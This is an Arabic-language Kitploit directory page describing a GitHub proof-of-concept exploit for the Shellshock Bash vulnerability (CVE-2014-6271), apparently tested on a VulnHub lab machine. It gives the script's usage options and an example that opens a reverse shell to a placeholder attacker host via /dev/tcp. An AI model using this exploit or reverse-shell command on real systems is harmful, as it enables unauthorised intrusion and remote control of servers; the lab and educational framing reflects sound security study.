Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2014-6271-Shellshock — استغلال CVE-2014-6271 | بواسطة infrar3d | Kitploit
أدوات/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

استغلال CVE-2014-6271 | بواسطة infrar3d

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 5 أشهرلم تتم المراجعة بعد

CVE-2014-6271 Shellshock

تم استغلاله بواسطة infrar3d

يحتوي هذا المستودع على برهان مفهوم (Proof-of-Concept) لاستغلال ثغرة CVE-2014-6271 (Shellshock).

تُعد Shellshock ثغرة أمنية حرجة في GNU Bash حيث تسمح متغيرات البيئة المُعدّة بعناية بـتنفيذ أوامر عشوائية.
عندما يمرر خادم الويب ترويسات HTTP إلى نصوص CGI التي تستدعي Bash، يمكن للمهاجم حقن أوامر عبر تلك الترويسات.

الاستخدام:

root@kitploit:~
./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	print this message and exit
	-a | --address	target address (default is "localhost")
	-p | --port	target port (default is 80)
	-f | --file	target file (default is "/cgi-bin/shell.sh")
	-c | --command	command to execute on the target machine (default is "id")

أمثلة:

root@kitploit:~
./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(تم اختباره على جهاز VulnHub "Hacksudo - Thor")

⚠️ إخلاء مسؤولية ⚠️

هذا البرنامج ورمز برهان المفهوم مُقدَّم لأغراض تعليمية وبحثية فقط.

  • المؤلفون ليسوا مسؤولين عن أي إساءة استخدام أو ضرر يسببه هذا البرنامج.
  • لا تستخدمه ضد أي أنظمة دون إذن مسبق صريح.
  • استخدام هذه الأداة لمهاجمة أهداف دون موافقة غير قانوني.

أنت مسؤول عن الامتثال لجميع القوانين المعمول بها. استخدمها بأخلاق ومسؤولية.

تنزيل الأداة